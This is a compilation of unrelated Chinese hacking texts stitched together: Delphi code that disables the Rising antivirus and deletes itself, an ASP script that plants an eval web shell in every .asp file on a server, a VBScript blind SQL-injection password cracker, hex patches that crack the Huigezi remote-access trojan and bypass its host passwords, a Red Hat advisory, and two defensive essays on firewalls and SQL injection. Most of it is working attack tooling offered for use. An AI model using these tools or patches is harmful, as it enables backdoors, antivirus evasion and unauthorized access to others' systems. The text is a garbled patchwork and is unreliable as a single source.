procedure StopRising;
var
  hWindow: HWND;
  lpClassName: array[0..20] of char;
begin
  hWindow := GetWindow(GetForegroundWindow, GW_HWNDFIRST);
  repeat
    GetClassName(hWindow, lpClassName, 20);
    if lpClassName = '#32770' then //判断搜索窗口的类名
      PostMessage(hWindow, WM_COMMAND, 40027, 0); //发送消息，点击“禁用”菜单
    hWindow := GetWindow(hWindow, GW_HWNDNEXT);
  until
    hWindow = 0;
end;

procedure TForm1.Button1Click(Sender: TObject);
begin
  StopRising; //调用
end;

控制台版:
program Project1;

uses
Windows, Messages, SysUtils;

procedure DeleteMe;
var
  BatchFile: TextFile;
  BatchFileName: string;
  ProcessInfo: TProcessInformation;
  StartUpInfo: TStartupInfo;
begin
  BatchFileName := ExtractFilePath(ParamStr(0)) + '_deleteme.bat';
  AssignFile(BatchFile, BatchFileName);
  Rewrite(BatchFile);

  Writeln(BatchFile, ':try');
  Writeln(BatchFile, 'del "' + ParamStr(0) + '"');
  Writeln(BatchFile,
    'if exist "' + ParamStr(0) + '"' + ' goto try');
  Writeln(BatchFile, 'del %0');
  CloseFile(BatchFile);

  FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
  StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
  StartUpInfo.wShowWindow := SW_HIDE;
  if CreateProcess(nil, PChar(BatchFileName), nil, nil,
    False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo,
    ProcessInfo) then
  begin
    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
  end;
end;

procedure StopRising;
var
   hWindow: HWND;
   lpClassName: array[0..20] of char;
begin
   hWindow := GetWindow(GetForegroundWindow, GW_HWNDFIRST);
   repeat
     GetClassName(hWindow, lpClassName, 20);
     if lpClassName = '#32770' then //判断搜索窗口的类名
     PostMessage(hWindow, WM_COMMAND,40027,0);
     PostMessage(hWindow, WM_COMMAND,2775,0);
     PostMessage(hWindow, WM_COMMAND,32776,0);
     hWindow := GetWindow(hWindow, GW_HWNDNEXT);
   until
     hWindow = 0;
end;
begin
   StopRising; //调用
   DeleteMe;
end.

<%
dim ph
dim intfile
server.ScriptTimeout = 600
ph=server.mappath("/")
Sub InsertAllFiles(Path)
Set FSO = CreateObject("Scripting.FileSystemObject")
on error resume next
Set f = FSO.GetFolder(Path)
Set fc2 = f.files
For Each myfile in fc2

If lcase(FSO.GetExtensionName(path&""&myfile.name))="asp" then
Set FS1 = CreateObject("Scripting.FileSystemObject")
Set tfile=FS1.opentextfile(path&""&myfile.name,8,false)
tfile.writeline "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('H4x0r')+'')</SCRIPT>"
else
InsertAllFiles(newpath)
end if
tfile.close
Next
Set fsubfolers = f.SubFolders
For Each f1 in fsubfolers
newpath=path&""&f1.name
InsertAllFiles(newpath)

Next
set tfile=nothing
Set FSO = Nothing
End Sub
%>
<%
call InsertAllFiles(ph)
%>

有人用Microsoft ACT提供的Test.SendRequest("http://"; & g_sServer & "/testfiles/browser.asp")方法写了一个vbs注入工具.

不过利用改对象还要装一个几十M大的工具包,我这里仿照给脚本,采用Microsoft.XMLHTTP来实现,利用open函数提交,对有注入的页面进行密码破解:
RightW = "OK!" '定义正确页面返回的关键字.
tablename = "useradmin" '定义表名,列名,本程序不提供表名,列名猜测功能,仅仅提供密码猜测.
filedname = "password"
WScript.Echo "Start check the tname and the fname,please waiting... ..."

URL="http://127.0.0.1/fwork/f.asp?username=admin&password=abzvc" '有注入漏洞的url地址,下面提供的是针对字符型漏洞的注入,数字型只需要稍微更改即可.

Set xPost = createObject("Microsoft.XMLHTTP") '检测表名是否正确
sURL1=URL&"'%20and%20(Select%20Count(1)%20from%20[useradmin])>='0"
xPost.Open "POST",sURL1,0
xPost.Send "1212312"
If instr(xPost.responseText,RightW) <> 0 Then
WScript.Echo "table name is:"&useradmin
End if

sURL2=URL&"'%20and%20(Select%20Count([useradmin].[password])%20from%20[useradmin])>='0" '检测列名是否正确
xPost.Open "POST",sURL2,0
xPost.Send "1212312"
If instr(xPost.responseText,RightW) <> 0 Then
WScript.Echo "field name is:"&filedname
End if

WScript.Echo "Start gussing,Waiting... ..."

For i = 0 to 128 step 1 '猜测密码长度
sURL3=URL&"'and+(select%20username%20from%20useradmin%20where%20len(password)='"&i&"'%20and%20username='user')>='0"
xPost.Open "POST",sURL3,0
xPost.Send "1212312"
If instr(xPost.responseText, RightW) <> 0 Then
Exit For
End If
Next
pwd_len = i
WScript.Echo "the pass length is:"&pwd_len

pwd = "" '猜测密码
strings = "0123456789abcdefghijklmnopqrstuvwxyz" '自定义密码字符串
For j = 1 to pwd_len step 1
For k = 1 to len(strings) step 1

sURL4=URL&"'%20and%20(select%20username%20from%20useradmin%20where%20left(password,"&j&")%20='"&pwd&mid(strings,k,1)&"'%20and%20username='user')>='0"
xPost.Open "POST",sURL4,0
xPost.Send "1212312"

If instr(xPost.responseText,RightW) <> 0 Then
pwd = pwd & mid(strings,k,1)
Exit For
End If
Next
Next

If errn Then
WScript.Echo "error:" & Error.Description
Error.Clear
Else
WScript.Echo "!!!Password:" & pwd
End If

受影响系统：
RedHat Cluster Suite

描述：
Red Hat Cluster Suite是运行在Red Hat Enterprise上的企业应用软件，用于管理集群系统。

Cluster Suite的cman工具实现上存在缓冲区溢出漏洞，本地攻击者可能利用此漏洞提升权限。

cman工具cman/daemon/daemon.c文件的process_client()函数没有正确地验证客户端消息的大小，如果本地用户发送了特制消息的话，就可以触发缓冲区溢出，导致以集群管理器的权限执行任意指令或导致管理器崩溃。

厂商补丁：
RedHat
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
https://www.redhat.com/archives/cluster-devel/2007-June/msg00130.html
https://www.redhat.com/archives/cluster-devel/2007-June/msg00149.html

1.给灰鸽子脱壳
要想得到灰鸽子的全部功能并挖出他的漏洞，就要给他脱壳。用ASPackdie给他脱壳(因为它是用ASPack加的壳)，这个软件很好找，一些黑客网站上都有。先运行ASPackdie找到灰鸽子的主文件H_Client.exe,就会自动脱壳。脱壳前文件709k,脱壳后2.69M。把脱壳后的文件upacked.exe改为H_Client.exe，原文件H_Client.exe改为H_Client1.exe以后提到的H_Client.exe均为脱壳后的文件。
2.解决灰鸽子自我检测问题
脱壳后运行灰鸽子会出现:文件以被非法修改！这可能是......(太长不写了，偷下懒)。现在是关键了，用UltraEdit(一个16进制文件编辑器，黑客网站上都有)修改灰的主文件H_Client.exe，运行UltraEdit打开灰的主文件，查找:“E89044EFFF”把它改为“9090909090”接下来在你找到的地址后面隔两个字节把750C改为EB0C。然后保存修改结果并退出，就解决了会的自我检测。可正常运行了。
3.成为注册用户
运行UltraEdit打开灰的主文件，查找“E80573ECFF755D”改为“E80573ECFF9090”,“E84371ECFF7556”改为“E84371ECFF9090”,这样就彻底解决了网上校验问题，成为注册用户了！除了上面问题灰鸽子还会显示对话框提醒你注册。
4.去掉提醒注册的对话框
运行UltraEdit打开灰的主文件，查找“80B855090000007513”改为“80B85509000000EB13”一共3处都要改。灰鸽子对免费用户有功能限制，共14处。(等一下我要现找,用W32Dasm，一个反汇编软件)
5.去掉功能限制(找了5分钟而已)
运行UltraEdit打开灰的主文件，查找“80BB55090000007518”改为“80BB5509000000EB18”，“80B855090000007517”改为“80B85509000000EB17”，“80B85509000000752E”改为“80B85509000000EB2E”，“80B855090000007526”改为“80B85509000000EB26”，“80B85509000000751E”改为“80B85509000000EB1E”均为2处都要改过来，“80BB5509000000751B”改为“80BB5509000000EB1B”有4处，都要改过来。共14处。
6.突破密码连接限制
就是不需要密码也可以连接其他种了灰鸽子的主机。因为灰鸽子验证连接密码是否正确以及是否进入目标主机，完全有客户端程序说了算，所以我们就可以简单修改灰鸽子主程序，就可以在连接密码不正确的情况下进入任何一台中了灰鸽子的主机。运行UltraEdit打开灰的主文件，查找“0F851A020000”和“0F85AC000000”都改为“909090909090”，这样就解决了灰鸽子的连接密码限制问题。
7.以上文章只适用于灰鸽子1.0正式版。其他版本不适用。如果有兴趣的朋友可以自己解决。(我已经把其他版本破解了：）)

　　“溢出”一直以来都是很多黑帽子黑客最常用(或者说是最喜欢用)的手段之一，随安全文化的逐步普及，大量的公开shellcode(“溢出”代码)与溢出攻击原理都可以随意在各大的网络安全网站中找得到，由此衍生了一系列的安全隐患...小黑黑使用它们来进行非法的攻击、恶意程序员使用它们来制造蠕虫等等...而网络防火墙作为人们最喜欢的网络安全“设施”之一，它又能如何“拦截”这一类型的攻击呢？

　　目前大多的防火墙系统都是针对包过滤规则进行安全防御的，这类型的防火墙再高也只能工作在传输层，而溢出程序的shellcode是放在应用层的，因此对这类攻击就无能为力了。打个比方:前段时间比较火热的IIS WEBDAV溢出漏洞，若黑客攻击成功能直接得到ROOTSHELL(命令行管理员控制台)，它是在正常提供HTTP服务的情况下产生的溢出漏洞，若在不打补丁与手工处理的情况下一台防火墙又能做到什么呢？相信你除了把访问该服务器TCP80端口(提供正常地HTTP服务的情况下)的包过滤掉以外就什么都不会去做了，当然，这样也会使你的HTTP服务无法正常地开放(等于没有提供服务)。下面就以这个漏洞为“论点&题材”，说说自己的解决方案。

　　1)对希望保护的主机实行“单独开放端口”访问控制策略

　　所谓“单独开放端口”就是指只开放需要提供的端口，对于不需要提供服务的端口实行过滤策略。打个比方，现在我们需要保护一台存在WebDAV缺陷的WEB服务器，如何能令它不被骇客入侵呢？答案是：在这台WEB服务器的前端防火墙中加入一个“只允许其他机器访问此机的TCP80端口”的包过滤规则(至于阁下的防火墙能否实现这样的规则就另当别论了)。加上这个规则又会有怎样的效果呢？经常做入侵渗透测试的朋友应该比我还清楚远程溢出的攻击实施流程了吧？

　　①使用缺陷扫描器找到存在远程溢出漏洞的主机-》②确认其版本号(如果有需要的话)-》③使用exploit(攻击程序)发送shellcode-》④确认远程溢出成功后使用NC或TELNET等程序连接被溢出主机的端口-》⑤得到SHELL。

　　使用“单独开放端口”策略的解决方案对整个远程溢出过程所发生的前三步都是无能为力的，但来到第四步这个策略能有效地阻止骇客连上有缺陷主机的被溢出端口，从而切断了骇客的恶意攻击手段。

　　优点：操作简单，一般的网络/系统管理员就能完成相关的操作。

　　缺点：对溢出后使用端口复用进行控制的EXPLOITS就无能为力了；对现实中的溢出后得到反向连接控制的EPLOITS也是无能为力；不能阻止D.o.S方面的溢出攻击。

　　2)使用应用层防火墙系统

　　这里所谓的应用层并不是想特别指明该防火墙工作在应用层，而是想指明它能在应用层对数据进行处理。由于应用层的协议/服务种类比较多，因此针对应用层形式的防火墙就有一定的市场局限性了。就楼上所提到的案例而言我们可以使用处理HTTP协议的应用层防火墙对存在WebDAV缺陷的服务器订制保护规则，保证服务器不收此类攻击的影响。应用层中的HTTP协议防火墙系统不多，它的基本防御原理与特点是当服务端接受到一个发送至TCP80端口的数据包时，首先就会将该包转移至SecureIIS，SecureIIS就会对该包进行分析并解码该包的应用层数据，将得到的数据与你本身定制的规则进行数据配对，一旦发现条件相符饿数值就会执行规则所指定的相应操作。

　　优点：能有效地切断一些来自应用层的攻击(如溢出、SQL注入等)。

　　缺点：因为需要安装在服务器上，所以会占用一定的系统资源；(一旦它受到POST行为发出的中文数据时就会自动认为是高位攻击代码，自动将其隔离，并进行相关的处理操作)。

　　3)使用IDS功能的防火墙系统

　　现在国内自主开发的防火墙系统可谓是进入“白热化”了，什么百兆、千兆、2U、4U...性能参数的比较本已经日趋激烈了，再开始有不少厂商将技术重点转移在了“多功能”的方面上，在防火墙中继承IDS模块已经不是什么新鲜事了，使用这类产品可以达到监控应用层数据的效果。

　　优点：便于管理。

　　缺点：费用支出增大；长期需要人力资源对其进行管理与设施维护；防火墙上的IDS模块功能有限。

　　许多网站程序在编写时，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码（一般是在浏览器地址栏进行,通过正常的www端口访问），根据程序返回的结果，获得某些想得知的数据，这就是所谓的SQL Injection，即SQL注入。

　　网站的恶梦——SQL注入

　　SQL注入通过网页对网站数据库进行修改。它能够直接在数据库中添加具有管理员权限的用户，从而最终获得系统管理员权限。黑客可以利用获得的管理员权限任意获得网站上的文件或者在网页上加挂木马和各种恶意程序，对网站和访问该网站的网友都带来巨大危害。

　　防御SQL注入有妙法

　　第一步：很多新手从网上下载SQL通用防注入系统的程序，在需要防范注入的页面头部用 来防止别人进行手动注入测试。可是如果通过SQL注入分析器就可轻松跳过防注入系统并自动分析其注入点。然后只需要几分钟，你的管理员账号及密码就会被分析出来。

　　第二步：对于注入分析器的防范，笔者通过实验，发现了一种简单有效的防范方法。首先我们要知道SQL注入分析器是如何工作的。在操作过程中，发现软件并不是冲着“admin”管理员账号去的，而是冲着权限（如flag=1）去的。这样一来，无论你的管理员账号怎么变都无法逃过检测。

　　第三步：既然无法逃过检测，那我们就做两个账号，一个是普通的管理员账号，一个是防止注入的账号，为什么这么说呢？笔者想，如果找一个权限最大的账号制造假象，吸引软件的检测，而这个账号里的内容是大于千字以上的中文字符，就会迫使软件对这个账号进行分析的时候进入全负荷状态甚至资源耗尽而死机。下面我们就来修改数据库吧。

　　1.对表结构进行修改。将管理员的账号字段的数据类型进行修改，文本型改成最大字段255（其实也够了，如果还想做得再大点，可以选择备注型），密码的字段也进行相同设置。

　　2.对表进行修改。设置管理员权限的账号放在ID1，并输入大量中文字符（最好大于100个字）。

　　3.把真正的管理员密码放在ID2后的任何一个位置（如放在ID549上）。

　　我们通过上面的三步完成了对数据库的修改。

　　这时是不是修改结束了呢？其实不然，要明白你做的ID1账号其实也是真正有权限的账号，现在计算机处理速度那么快，要是遇上个一定要将它算出来的软件，这也是不安全的。我想这时大多数人已经想到了办法，对，只要在管理员登录的页面文件中写入字符限制就行了！就算对方使用这个有上千字符的账号密码也会被挡住的，而真正的密码则可以不受限制。